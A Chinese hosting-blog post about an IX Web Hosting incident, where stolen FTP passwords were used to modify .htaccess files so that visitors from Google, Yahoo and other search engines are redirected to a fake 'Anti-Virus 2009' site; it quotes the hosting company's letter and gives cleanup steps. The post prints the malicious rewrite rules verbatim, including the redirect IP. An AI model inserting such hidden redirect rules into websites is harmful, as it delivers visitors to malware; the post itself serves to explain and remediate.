关于IXwebhosting上出现的安全问题
![]() | ![]() | ![]() | ![]() |
| 【性价之王】 | 【线路之王】 | 【价格之王】 | 【配置之王】 |
| 【免费之王】 | 【香港首推】 | 【梯子之王】 | 【独服之王】 |
症状:直接进入网站没有问题,从google等国外著名搜索引擎进入网站就会转向到一个病毒网站。
具体例子请看: http://bbs.idcspy.com/thread-36706-1-1.html
原因: 网站的.htaccess文件被修改,会加入如下代码:
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://89.28.13.202/in.html?s=ix [R,L]
上面的代码就是判断访问者来源,如果是来自上面那些搜索引擎,就自动转向
解决方法: 修正.htaccess,并且去掉.htaccess的写入权限。同时修正根目录的权限,去掉写入权限。
来自IXwebhosting官方的信息,此安全隐患已经得到修正,他们也杀掉了服务器上大部分此类病毒,如果还有问题,请联系ixwebhosting检查。被感染的原因可能是由于你的ftp密码被盗,进而被修改网站文件。
下面是ixwebhosting关于此问题发给用户的信件:
In our ongoing commitment to the security of our customers, we have discovered a vulnerability located within many of our client’s websites, including yours. This is a self replicating virus which is found by visiting well-known search engines. When you click on any link it may redirect you to a fake Anti-Virus 2009 website which appears to scan your system and then asks you to download the software. Once downloaded and installed it begins displaying pop ups on your desktop. At this time it collects your FTP user name and password from your own computer and uses that information to upload an exploited file named “.htaccess” to your website. Any visitors to your website will then be redirected to the fake anti-virus website.
We have dedicated our systems administration team to finding a solution to this and are happy to say that as one of the first hosting companies we have successfully cleaned all instances of this virus from our servers more than a week ago, and are continually scanning them to ensure your site does not become re-infected.
While your website is now secure, your computer may still be at risk. Here are two easy steps that will detect and remove this malicious software from your computer and make sure your website will not spread the virus again:
1. Uninstall the fake Anti-Virus software by following the instructions at this link:
http://www.bleepingcomputer.com/ … tall-antivirus-2009
2. Once removed, change your FTP password from within your web hosting control panel. Once logged in, click on the FTP Manager icon and then on the icon next to the password to change it.
To illustrate the severity of the issue I would like to share some facts with you:
* 26,991 of our customers have been infected with fake Anti-Virus 2009
* 79,469 websites have been spreading the Anti-Virus 2009 infection
* 120,923 malicious files have been removed from our system
We are constantly monitoring our servers for potential threats to your website, and are proud to say that we are among the first web hosts to identify this particular problem, and have been the first to offer a resolution. Your continued and safe presence on the internet is our top priority.
If you have questions regarding any of this information, please contact our support team anytime.
Kind Regards,
Fatima Said, CCO
IX Web Hosting
猜你可能想看的VPS
- W3Space→$15 年 1GB 内存 25GB SSD 空间 1.5虚拟空间(主机)
- 299 元 年 1G 内存 15G SSD 2Mbps 不限量 XEN 香港VPS[主机]
- GigsGigsCloud→香港(CN2)高防服务器 8 折 215 美香港VPS[主机]
- 新加坡 VPS 46.5 元每月 1G 内存 650G 流量 新加坡 H全球[VPS测评]
- 大带宽高防 ¥1210 年 2 核 CPU 4G 内存 40G SSD 全球[VPS测评]
- Scarlet Cloud→134.4 元 半年 256MB 内存 5G虚拟空间(主机)
- 促销 iON→圣何塞线路改善 8 折优惠一个月 1 核 2G 50G S全球[VPS测评]
- 老鹰主机万圣节促销→虚拟主机 5 折 分销主机 6 折全球[VPS测评]
- 便宜 bigfootservers→10.75 美元 月 可以购买 15全球[VPS测评]
- 盘点2021年国内外VPS云服务器可视化面板和一键安装脚本全球[VPS测评]
- hostkvm新上洛杉矶联通线路 VPS 云服务器 AS4837/1G内全球[VPS测评]
- WordPress网站上传图片出现http报错解决办法全球[VPS测评]
- Centos7的firewall 防火墙如何设置端口转发?全球[VPS测评]
- 1分钟快速读懂云计算全球[VPS测评]
- 游戏服务器是什么意思?游戏服务器可以用云服务器吗?全球[VPS测评]
- 文物、沉船、村落!干旱导致大量遗迹重见天日 2022年干旱还要持续多久?全球[VPS测评]
- wikihost,微基主机服务,100M带宽香港CMIVPS,5G防御,香港VPS[主机]
- 搬瓦工:美国香港cn2 gia线路VPS,10Gbps带宽,移动+联通企美国VPS[主机]
- 弘速科技:香港安畅CN2 GIA/弹性云服务器10元/月,2核1GB/2香港VPS[主机]
- CubeCloud,靠谱的香港cn2vps,美国cn2终身九折,原生IP美国VPS[主机]
- 乐趣云怎么样?香港美国云服务器首月8.8元,新增IP5元/个美国VPS[主机]
- 腾讯云海外服务器优惠活动:全球购1核2G美国云服务器低至318元/年美国VPS[主机]
- 跨境电商有哪些平台?十大跨境电商平台!全球[VPS测评]
- 众创逸云:元旦优惠活动,香港美国CN2云服务器4核4G30M,仅售309美国VPS[主机]
- 微基主机:1核1G香港云服务器,100Mbps/香港CN2直连/KVM/香港VPS[主机]
- pittqiao:彰化HiNet/台北CN2/东京NTT/上海茂名联通C全球[VPS测评]
- 阿里云和腾讯云免备案香港云服务器哪个更优惠?香港VPS[主机]
- 酷锐云:香港安畅机房4H/4G/60G/20Mbps,45元/月;香港C香港VPS[主机]
- 恒星云:高防服务器优惠活动,成都高防云服务器及辽宁香港服务器特惠活动香港VPS[主机]
- 孤狼云:2021春节优惠,香港安畅CN2、香港沙田CN2云服务器低至10香港VPS[主机]
转载请注明原文地址:http://140.238.13.167:12355/read-118284.html











